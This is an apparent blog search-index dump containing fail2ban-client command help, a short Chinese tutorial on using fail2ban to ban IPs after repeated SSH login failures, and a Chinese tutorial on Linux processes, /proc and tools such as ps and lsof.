ERROR, WARNING, NOTICE, INFO, DEBUG, TRACEDEBUG, HEAVYDEBUG or corresponding numeric value (50-5) get loglevel gets the logging level set logtarget \u0026lt;TARGET\u0026gt; sets logging target to \u0026lt;TARGET\u0026gt;. Can be STDOUT, STDERR, SYSLOG or a file get logtarget gets logging target set syslogsocket auto|\u0026lt;SOCKET\u0026gt; sets the syslog socket path to auto or \u0026lt;SOCKET\u0026gt;. Only used if logtarget is SYSLOG get syslogsocket gets syslog socket path flushlogs flushes the logtarget if a file and reopens it. For log rotation. DATABASE set dbfile \u0026lt;FILE\u0026gt; set the location of fail2ban persistent datastore. 
Set to \u0026#34;None\u0026#34; to disable get dbfile get the location of fail2ban persistent datastore set dbmaxmatches \u0026lt;INT\u0026gt; sets the max number of matches stored in database per ticket get dbmaxmatches gets the max number of matches stored in database per ticket set dbpurgeage \u0026lt;SECONDS\u0026gt; sets the max age in \u0026lt;SECONDS\u0026gt; that history of bans will be kept get dbpurgeage gets the max age in seconds that history of bans will be kept JAIL CONTROL add \u0026lt;JAIL\u0026gt; \u0026lt;BACKEND\u0026gt; creates \u0026lt;JAIL\u0026gt; using \u0026lt;BACKEND\u0026gt; start \u0026lt;JAIL\u0026gt; starts the jail \u0026lt;JAIL\u0026gt; stop \u0026lt;JAIL\u0026gt; stops the jail \u0026lt;JAIL\u0026gt;. The jail is removed status \u0026lt;JAIL\u0026gt; [FLAVOR] gets the current status of \u0026lt;JAIL\u0026gt;, with optional flavor or extended info JAIL CONFIGURATION set \u0026lt;JAIL\u0026gt; idle on|off sets the idle state of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignoreself true|false allows the ignoring of own IP addresses set \u0026lt;JAIL\u0026gt; addignoreip \u0026lt;IP\u0026gt; adds \u0026lt;IP\u0026gt; to the ignore list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delignoreip \u0026lt;IP\u0026gt; removes \u0026lt;IP\u0026gt; from the ignore list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignorecommand \u0026lt;VALUE\u0026gt; sets ignorecommand of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignorecache \u0026lt;VALUE\u0026gt; sets ignorecache of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addlogpath \u0026lt;FILE\u0026gt; [\u0026#39;tail\u0026#39;] adds \u0026lt;FILE\u0026gt; to the monitoring list of \u0026lt;JAIL\u0026gt;, optionally starting at the \u0026#39;tail\u0026#39; of the file (default \u0026#39;head\u0026#39;). 
set \u0026lt;JAIL\u0026gt; dellogpath \u0026lt;FILE\u0026gt; removes \u0026lt;FILE\u0026gt; from the monitoring list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; logencoding \u0026lt;ENCODING\u0026gt; sets the \u0026lt;ENCODING\u0026gt; of the log files for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addjournalmatch \u0026lt;MATCH\u0026gt; adds \u0026lt;MATCH\u0026gt; to the journal filter of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; deljournalmatch \u0026lt;MATCH\u0026gt; removes \u0026lt;MATCH\u0026gt; from the journal filter of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addfailregex \u0026lt;REGEX\u0026gt; adds the regular expression \u0026lt;REGEX\u0026gt; which must match failures for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delfailregex \u0026lt;INDEX\u0026gt; removes the regular expression at \u0026lt;INDEX\u0026gt; for failregex set \u0026lt;JAIL\u0026gt; addignoreregex \u0026lt;REGEX\u0026gt; adds the regular expression \u0026lt;REGEX\u0026gt; which should match pattern to exclude for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delignoreregex \u0026lt;INDEX\u0026gt; removes the regular expression at \u0026lt;INDEX\u0026gt; for ignoreregex set \u0026lt;JAIL\u0026gt; findtime \u0026lt;TIME\u0026gt; sets the number of seconds \u0026lt;TIME\u0026gt; for which the filter will look back for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; bantime \u0026lt;TIME\u0026gt; sets the number of seconds \u0026lt;TIME\u0026gt; a host will be banned for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; datepattern \u0026lt;PATTERN\u0026gt; sets the \u0026lt;PATTERN\u0026gt; used to match date/times for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; usedns \u0026lt;VALUE\u0026gt; sets the usedns mode for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; attempt \u0026lt;IP\u0026gt; [\u0026lt;failure1\u0026gt; ... 
\u0026lt;failureN\u0026gt;] manually notify about \u0026lt;IP\u0026gt; failure set \u0026lt;JAIL\u0026gt; banip \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; manually Ban \u0026lt;IP\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; unbanip [--report-absent] \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; manually Unban \u0026lt;IP\u0026gt; in \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxretry \u0026lt;RETRY\u0026gt; sets the number of failures \u0026lt;RETRY\u0026gt; before banning the host for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxmatches \u0026lt;INT\u0026gt; sets the max number of matches stored in memory per ticket in \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxlines \u0026lt;LINES\u0026gt; sets the number of \u0026lt;LINES\u0026gt; to buffer for regex search for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addaction \u0026lt;ACT\u0026gt;[ \u0026lt;PYTHONFILE\u0026gt; \u0026lt;JSONKWARGS\u0026gt;] adds a new action named \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt;. 
Optionally for a Python based action, a \u0026lt;PYTHONFILE\u0026gt; and \u0026lt;JSONKWARGS\u0026gt; can be specified, else will be a Command Action set \u0026lt;JAIL\u0026gt; delaction \u0026lt;ACT\u0026gt; removes the action \u0026lt;ACT\u0026gt; from \u0026lt;JAIL\u0026gt; COMMAND ACTION CONFIGURATION set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstart \u0026lt;CMD\u0026gt; sets the start command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstop \u0026lt;CMD\u0026gt; sets the stop command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actioncheck \u0026lt;CMD\u0026gt; sets the check command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionban \u0026lt;CMD\u0026gt; sets the ban command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionunban \u0026lt;CMD\u0026gt; sets the unban command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; timeout \u0026lt;TIMEOUT\u0026gt; sets \u0026lt;TIMEOUT\u0026gt; as the command timeout in seconds for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; GENERAL ACTION CONFIGURATION set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;PROPERTY\u0026gt; \u0026lt;VALUE\u0026gt; sets the \u0026lt;VALUE\u0026gt; of \u0026lt;PROPERTY\u0026gt; for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;METHOD\u0026gt;[ \u0026lt;JSONKWARGS\u0026gt;] calls the \u0026lt;METHOD\u0026gt; with \u0026lt;JSONKWARGS\u0026gt; for the action \u0026lt;ACT\u0026gt; for 
\u0026lt;JAIL\u0026gt; JAIL INFORMATION get \u0026lt;JAIL\u0026gt; logpath gets the list of the monitored files for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; logencoding gets the encoding of the log files for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; journalmatch gets the journal filter match for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignoreself gets the current value of the ignoring the own IP addresses get \u0026lt;JAIL\u0026gt; ignoreip gets the list of ignored IP addresses for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignorecommand gets ignorecommand of \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; failregex gets the list of regular expressions which matches the failures for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignoreregex gets the list of regular expressions which matches patterns to ignore for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; findtime gets the time for which the filter will look back for failures for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; bantime gets the time a host is banned for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; datepattern gets the patern used to match date/times for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; usedns gets the usedns setting for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxretry gets the number of failures allowed for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxmatches gets the max number of matches stored in memory per ticket in \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxlines gets the number of lines to buffer for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; actions gets a list of actions for \u0026lt;JAIL\u0026gt; COMMAND ACTION INFORMATION get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstart gets the start command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstop gets the stop command for the action 
\u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actioncheck gets the check command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionban gets the ban command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionunban gets the unban command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; timeout gets the command timeout in seconds for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; GENERAL ACTION INFORMATION get \u0026lt;JAIL\u0026gt; actionproperties \u0026lt;ACT\u0026gt; gets a list of properties for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; actionmethods \u0026lt;ACT\u0026gt; gets a list of methods for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;PROPERTY\u0026gt; gets the value of \u0026lt;PROPERTY\u0026gt; for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; Report bugs to https://github.com/fail2ban/fail2ban/issues Report bugs to https://github.com/fail2ban/fail2ban/issues\n","permalink":"https://wdd.js.org/posts/2020/04/ih9pz2/","summary":"简介 如果你的主机在公网上有端口暴露出去,那么总会有一些不怀好意的家伙,会尝试通过各种方式攻击你的机器。常见的服务例如ssh, nginx都会有类似的威胁。\n手工将某个ip加入黑名单,这种操作太麻烦,而且效率低。而fail2ban就是一种自动化的解决方案。\nfail2ban工作原理 fail2ban的工作原理是监控某个日志文件,然后根据某些关键词,提取出攻击方的IP地址,然后将其加入到黑名单。\nfail2ban安装 yum install fail2ban -y # 如果找不到fail2ban包,就执行下面的命令 yum install epel-release # 安装fail2ban 完成后 systemctl enable fail2ban # 设置fail2ban开机启动 systemctl start fail2ban # 启动fail2ban systemctl status fail2ban # 查看fail2ban的运行状态 用fail2ban保护ssh fail2ban的配置文件位于/etc/fail2ban目录下。\n在该目录下建立一个文件 jail.local, 内容如下\nbantime 持续禁止多久 maxretry 最大多少次尝试 banaction 拦截后的操作 findtime 查找时间 
看下下面的操作的意思是:监控sshd服务的最近10分钟的日志,如果某个ip在10分钟之内,有2次登录失败,就把这个ip加入黑名单, 24小时之后,这个ip才会被从黑名单中移除。\n[DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true 然后重启fail2ban, systemctl restart fail2ban fail2ban提供管理工具fail2ban-client","title":"自动IP拦截工具fail2ban使用教程"},{"content":"思考题:当你用ssh登录到一个linux机器,并且执行了某个hello.sh之后,有哪些进程参与了该过程?\nlinux系统架构 kernel mode user mode 内核态和用户态的区别 什么是进程 进程是运行的程序 process 是对 processor 虚拟化,通过时间片 进程都有uid nginx访问某个目录,Permission denied\n进程都有pid $$ 进程都有父进程 准确来说,除了pid为0的进程之外,其他进程都有父进程 有时候,你用kill命令杀死了一个进程,但是立马你就发现这个进程又起来了。你就要看看,这个进程是不是有个非init进程的父进程。一般这个进程负责监控子进程,一旦子进程挂掉,就会去重新创建一个进程。所以你需要找到这个父进程的Id,先把父进程kill掉,然后再kill子进程。 进程是一棵树 #!/bin/bash echo \u0026#34;pid is $$\u0026#34; times=0 while true do sleep 2s; let times++; echo $times hello; done ➜ ~ pstree 24601 sshd─┬─3*[sshd───zsh] ├─sshd───zsh───pstree └─sshd───zsh───world.sh───sleep 进程都有生命周期 创建 销毁 进程都有状态 running 进程占用CPU, 正在执行指令 ready 进程所有需要的资源都已经就绪,等待进入CPU执行 blocked 进程被某些事件阻断,例如IO。 进程的状态转移图\n进程都有打开的文件描述符 使用lsof命令,可以查看某个进程所打开的文件描述符\n/proc/pid/fd/目录下也有文件描述符\nlsof -c 进程名\nlsof -p 进程号\nlsof filename # 查看某个文件被哪个进程打开\n[root@localhost ~]# lsof -c rtpproxy COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME rtpproxy 2073 root cwd DIR 253,0 4096 128 / rtpproxy 2073 root rtd DIR 253,0 4096 128 / rtpproxy 2073 root txt REG 253,0 933247 18295252 /usr/local/bin/rtpproxy rtpproxy 2073 root mem REG 253,0 2127336 33617010 /usr/lib64/libc-2.17.so rtpproxy 2073 root mem REG 253,0 44448 33617041 /usr/lib64/librt-2.17.so rtpproxy 2073 root mem REG 253,0 19776 34757658 /usr/lib64/libdl-2.17.so rtpproxy 2073 root mem REG 253,0 1139680 34757660 /usr/lib64/libm-2.17.so rtpproxy 2073 root mem REG 253,0 144792 33617035 /usr/lib64/libpthread-2.17.so rtpproxy 2073 root mem REG 253,0 164112 33595530 /usr/lib64/ld-2.17.so rtpproxy 2073 root 0u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 1u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 2u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 3u IPv4 17641 
0t0 UDP 192.168.40.100:7890 rtpproxy 2073 root 4u unix 0xffff880079260000 0t0 17642 socket rtpproxy 2073 root 8u IPv4 72592335 0t0 UDP 192.168.40.100:25257 进程都有资源限制 /proc/pid/limits\n以rtpproxy为例子,rtpproxy的pid为2073, /proc/pid/limits文件记录进程的资源限制\n进程都有环境变量 /proc/pid/environ\n进程都有参数 /proc/pid/cmdline\nrtpproxy-A192.168.40.100-l192.168.40.100-sudp:192.168.40.1007890-F-m20000-M40000-L20000-dDBUG[root@localhost 2073]# 进程都有名字 /proc/2073/status\nName:\trtpproxy State:\tS (sleeping) Tgid:\t2073 Ngid:\t0 Pid:\t2073 PPid:\t1 TracerPid:\t0 Uid:\t0\t0\t0\t0 Gid:\t0\t0\t0\t0 进程皆有退出码 非0的退出码一般是异常退出 $? [root@localhost 2073]# cat \u0026#34;test\u0026#34; [root@localhost 2073]# echo $? 1 [root@localhost 2073]# echo $? 0 进程可以fork 孤儿进程 孤儿进程:一个父进程退出,而它的一个或多个子进程还在运行,那么那些子进程将成为孤儿进程。孤儿进程将被init进程(进程号为1)所收养,并由init进程对它们完成状态收集工作。\n僵尸进程 僵尸进程:一个进程使用fork创建子进程,如果子进程退出,而父进程并没有调用wait或waitpid获取子进程的状态信息,那么子进程的进程描述符仍然保存在系统中。这种进程称之为僵死进程。 僵尸进程占用进程描述符,无法释放,会导致系统无法正常的创建进程。\n\u0026gt; cat /proc/sys/kernel/pid_max 32768 进程间通信 进程之间的所有资源都是完全隔离的,所以进程之间如何通信呢?\n在linux底层,有个套接字API\nSOCKET socket (int domain, int type, int protocol) domain 表示域,一般有两个值 AF_INET 即因特网 AF_LOCAL 用于同一台机器上的进程间通信 type 表示类型 SOCK_STREAM 提供可靠的、全双工、面向连接的字节流,一般就是TCP SOCK_DGRAM 提供不可靠、尽力而为的数据报服务,一般就是UDP SOCK_RAW 允许直接访问IP层原生的数据报 也就是说,进程间通信,实际上也是用的socket\n守护进程 守护进程一般是后台运行的进程,例如sshd, mysqld, dockerd等等,他们的特点就是他们的ppid是1, 也就是说,守护进程也是孤儿进程的一种。\nroot 9696 1 0 Oct06 ? 00:05:16 /usr/sbin/sshd -D idle进程与init进程 Linux下有3个特殊的进程:idle进程(PID = 0), init进程(PID = 1)和kthreadd(PID = 2)\nidle进程由系统自动创建, 运行在内核态。idle进程其pid=0,其前身是系统创建的第一个进程,也是唯一一个没有通过fork或者kernel_thread产生的进程。完成加载系统后,演变为进程调度、交换 init进程由idle通过kernel_thread创建,在内核空间完成初始化后, 加载init程序, 并最终进入用户空间。由0进程创建,完成系统的初始化.
是系统中所有其它用户进程的祖先进程 Linux中的所有进程都是由init进程创建并运行的。首先Linux内核启动,然后在用户空间中启动init进程,再启动其他系统进程。在系统启动完成后,init将变为守护进程监视系统其他进程。 kthreadd进程由idle通过kernel_thread创建,并始终运行在内核空间, 负责所有内核线程的调度和管理 参考:https://blog.csdn.net/gatieme/article/details/51484562\n线程 ps -m可以在进程之后显示线程。线程的tid也会占用一个/proc/tid目录,和进程的/proc/pid 目录没什么区别。\n只不过进程的Tgid(线程组Id)是自己的pid, 而其他线程的Tgid是主线程的pid。\nps -em -o pid,tid,command | grep rtpproxy -A10 2112 - rtpproxy -l 192.168.40.101 -s udp:192.168.40.101 7890 -F -m 20000 -M 40000 -L 20000 -d DBUG - 2112 - - 2113 - - 2114 - - 2115 - - 2116 - - 2117 - - 2118 - 进程与线程的区别 关于/proc目录 proc目录是一个虚拟的文件系统,实际上是内核的数据结构的映射。里面的大部分的文件都是只读的,只有少部分是可写的。\n关于进程运行时信息,都可以在这个目录找到。\n下面的链接详细的介绍了每个目录的作用。\nhttps://www.linux.com/news/discover-possibilities-proc-directory/\nhttps://www.tldp.org/LDP/sag/html/proc-fs.html\nhttp://man7.org/linux/man-pages/man5/proc.5.html\n思考\n如何获取某个执行进程的可执行文件的路径? proc目录下的文件有何特点? 以下的几个文件是比较重要的,着重说明一下。\ncmdline 执行参数 environ 环境变量 exe -\u0026gt; /usr/local/bin/rtpproxy 可执行文件位置 fd 文件描述符信息 limits 资源限制 oom killer机制:杀掉最胖的那个进程 oom_adj oom_score oom_score_adj status 状态信息 dr-xr-xr-x. 2 root root 0 Jan 14 15:56 attr -rw-r--r--. 1 root root 0 Jan 14 15:56 autogroup -r--------. 1 root root 0 Jan 14 15:56 auxv -r--r--r--. 1 root root 0 Nov 6 17:59 cgroup --w-------. 1 root root 0 Jan 14 15:56 clear_refs -r--r--r--. 1 root root 0 Nov 6 10:26 cmdline -rw-r--r--. 1 root root 0 Nov 6 17:59 comm -rw-r--r--. 1 root root 0 Jan 14 15:56 coredump_filter -r--r--r--. 1 root root 0 Jan 14 15:56 cpuset lrwxrwxrwx. 1 root root 0 Jan 14 15:56 cwd -\u0026gt; / -r--------. 1 root root 0 Jan 14 15:56 environ lrwxrwxrwx. 1 root root 0 Nov 6 17:59 exe -\u0026gt; /usr/local/bin/rtpproxy dr-x------. 2 root root 0 Jan 14 15:56 fd dr-x------. 2 root root 0 Jan 14 15:56 fdinfo -rw-r--r--. 1 root root 0 Jan 14 15:56 gid_map -r--------. 1 root root 0 Jan 14 15:56 io -r--r--r--. 1 root root 0 Jan 14 15:56 limits -rw-r--r--. 1 root root 0 Nov 6 17:59 loginuid dr-x------. 
2 root root 0 Jan 14 15:56 map_files -r--r--r--. 1 root root 0 Jan 14 15:56 maps -rw-------. 1 root root 0 Jan 14 15:56 mem -r--r--r--. 1 root root 0 Jan 14 15:56 mountinfo -r--r--r--. 1 root root 0 Jan 14 15:56 mounts -r--------. 1 root root 0 Jan 14 15:56 mountstats dr-xr-xr-x. 5 root root 0 Jan 14 15:56 net dr-x--x--x. 2 root root 0 Jan 14 15:56 ns -r--r--r--. 1 root root 0 Jan 14 15:56 numa_maps -rw-r--r--. 1 root root 0 Jan 14 15:56 oom_adj -r--r--r--. 1 root root 0 Jan 14 15:56 oom_score -rw-r--r--. 1 root root 0 Jan 14 15:56 oom_score_adj -r--r--r--. 1 root root 0 Jan 14 15:56 pagemap -r--r--r--. 1 root root 0 Jan 14 15:56 personality -rw-r--r--. 1 root root 0 Jan 14 15:56 projid_map lrwxrwxrwx. 1 root root 0 Jan 14 15:56 root -\u0026gt; / -rw-r--r--. 1 root root 0 Jan 14 15:56 sched -r--r--r--. 1 root root 0 Nov 6 17:59 sessionid -rw-r--r--. 1 root root 0 Jan 14 15:56 setgroups -r--r--r--. 1 root root 0 Jan 14 15:56 smaps -r--r--r--. 1 root root 0 Jan 14 15:56 stack -r--r--r--. 1 root root 0 Jan 14 15:56 stat -r--r--r--. 1 root root 0 Jan 14 15:56 statm -r--r--r--. 1 root root 0 Nov 6 10:26 status -r--r--r--. 1 root root 0 Jan 14 15:56 syscall dr-xr-xr-x. 9 root root 0 Jan 14 15:56 task -r--r--r--. 1 root root 0 Jan 14 15:56 timers -rw-r--r--. 1 root root 0 Jan 14 15:56 uid_map -r--r--r--. 1 root root 0 Jan 14 15:56 wchan 工具简介 ps ps有三种风格的使用方式,我们一般使用前两种\nUnix风格 参数以-开头,如-a BSD风格,直接用参数 如a GNU风格,以\u0026ndash;开头 常用的有\nps -ef ps aux VSZ 虚拟内存,单位kb RSS 物理内存,单位kb ➜ 2112 ps -ef | head UID PID PPID C STIME TTY TIME CMD root 1 0 0 2018 ? 01:57:34 /usr/lib/systemd/systemd --system --deserialize 23 root 2 0 0 2018 ? 00:00:44 [kthreadd] root 3 2 0 2018 ? 00:05:44 [ksoftirqd/0] root 7 2 0 2018 ? 00:08:04 [migration/0] root 8 2 0 2018 ? 00:00:00 [rcu_bh] root 9 2 0 2018 ? 00:00:00 [rcuob/0] root 10 2 0 2018 ? 00:00:00 [rcuob/1] root 11 2 0 2018 ? 00:00:00 [rcuob/2] root 12 2 0 2018 ? 
00:00:00 [rcuob/3] ➜ 2112 ps aux | head USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 193524 3572 ? Ss 2018 117:34 /usr/lib/systemd/systemd --system --deserialize 23 root 2 0.0 0.0 0 0 ? S 2018 0:44 [kthreadd] root 3 0.0 0.0 0 0 ? S 2018 5:44 [ksoftirqd/0] root 7 0.0 0.0 0 0 ? S 2018 8:04 [migration/0] root 8 0.0 0.0 0 0 ? S 2018 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/0] root 10 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/1] root 11 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/2] root 12 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/3] ps 查看线程\n➜ 2118 ps -em -o pid,tid,command | grep rtpproxy -A 10 2112 - rtpproxy -l 192.168.40.101 -s udp:192.168.40.101 7890 -F -m 20000 -M 40000 -L 20000 -d DBUG - 2112 - - 2113 - - 2114 - - 2115 - - 2116 - - 2117 - - 2118 - cat /proc/2112/status Name:\trtpproxy State:\tS (sleeping) Tgid:\t2112 Ngid:\t0 Pid:\t2112 PPid:\t1 TracerPid:\t0 Uid:\t0\t0\t0\t0 Gid:\t0\t0\t0\t0 FDSize:\t16384 Groups:\t0 VmPeak:\t390896 kB VmSize:\t259824 kB VmLck:\t0 kB VmPin:\t0 kB VmHWM:\t121708 kB VmRSS:\t3532 kB VmData:\t246120 kB VmStk:\t136 kB VmExe:\t176 kB VmLib:\t3092 kB VmPTE:\t316 kB VmSwap:\t2272 kB Threads:\t7 SigQ:\t2/15086 SigPnd:\t0000000000000000 ShdPnd:\t0000000000000000 SigBlk:\t0000000000000000 SigIgn:\t0000000000001000 SigCgt:\t0000000187804a03 CapInh:\t0000000000000000 CapPrm:\t0000001fffffffff CapEff:\t0000001fffffffff CapBnd:\t0000001fffffffff Seccomp:\t0 Cpus_allowed:\tf Cpus_allowed_list:\t0-3 Mems_allowed:\t00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001 Mems_allowed_list:\t0 voluntary_ctxt_switches:\t259223710 nonvoluntary_ctxt_switches:\t2216 netstat netstat -nulp netstat -ntulp netstat -nap lsof Linux下所有信息都是文件,那么查看打开文件就比较重要了。 lsof 即 list open files, 查看打开的文件\nlsof -c processName 按照进程名查看 lsof -p pid 
按照pid查看 lsof file 查看文件被哪些进程打开 lsof -i:8080 查看8080被哪个进程占用 top top 1 P M 参考 http://turnoff.us/geek/inside-the-linux-kernel/ 《How Linux Works》 《Operating Systems three easy pieces》 讲虚拟化、并发、持久化三块 《理解Unix进程》 《Linux Shell Script cookbook》 https://www.internalpointers.com/post/gentle-introduction-multithreading https://dev.to/rrampage/surviving-the-linux-oom-killer-2ki9 附件书籍 proc(5) - Linux manual page.pdfCommand Line Text Processing - Sundeep Agarwal.pdfHow Linux Works _ What Every Superuser Sho - Brian Ward(Author).pdfOperating Systems three easy pieces - Unknown.pdf[Sarath Lakshman] Linux Shell Scripting Co - Unknown.pdftcp_ipGao Xiao Bian Cheng __Gai Shan Wang - Unknown.pdf\n","permalink":"https://wdd.js.org/posts/2020/04/pbcbub/","summary":"思考题:当你用ssh登录到一个linux机器,并且执行了某个hello.sh之后,有哪些进程参与了该过程?\nlinux系统架构 kernel mode user mode 内核态和用户态的区别 什么是进程 进程是运行的程序 process 是对 processor 虚拟化,通过时间片 进程都有uid nginx访问某个目录,Permission denied\n进程都有pid $$ 进程都有父进程 准确来说,除了pid为0的进程之外,其他进程都有父进程 有时候,你用kill命令杀死了一个进程,但是立马你就发现这个进程又起来了。你就要看看,这个进程是不是有个非init进程的父进程。一般这个进程负责监控子进程,一旦子进程挂掉,就会去重新创建一个进程。所以你需要找到这个父进程的Id,先把父进程kill掉,然后再kill子进程。 进程是一棵树 #!/bin/bash echo \u0026#34;pid is $$\u0026#34; times=0 while true do sleep 2s; let times++; echo $times hello; done ➜ ~ pstree 24601 sshd─┬─3*[sshd───zsh] ├─sshd───zsh───pstree └─sshd───zsh───world.sh───sleep 进程都有生命周期 创建 销毁 进程都有状态 running 进程占用CPU, 正在执行指令 ready 进程所有需要的资源都已经就绪,等待进入CPU执行 blocked 进程被某些事件阻断,例如IO。 进程的状态转移图\n进程都有打开的文件描述符 使用lsof命令,可以查看某个进程所打开的文件描述符\n/proc/pid/fd/目录下也有文件描述符\nlsof -c 进程名lsof -p 进程号lsof filename # 查看某个文件被哪个进程打开**\n[root@localhost ~]# lsof -c rtpproxy COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME rtpproxy 2073 root cwd DIR 253,0 4096 128 / rtpproxy 2073 root rtd DIR 253,0 4096 128 / rtpproxy 2073 root txt REG 253,0 933247 18295252 /usr/local/bin/rtpproxy rtpproxy 2073 root mem REG 253,0 2127336 33617010 
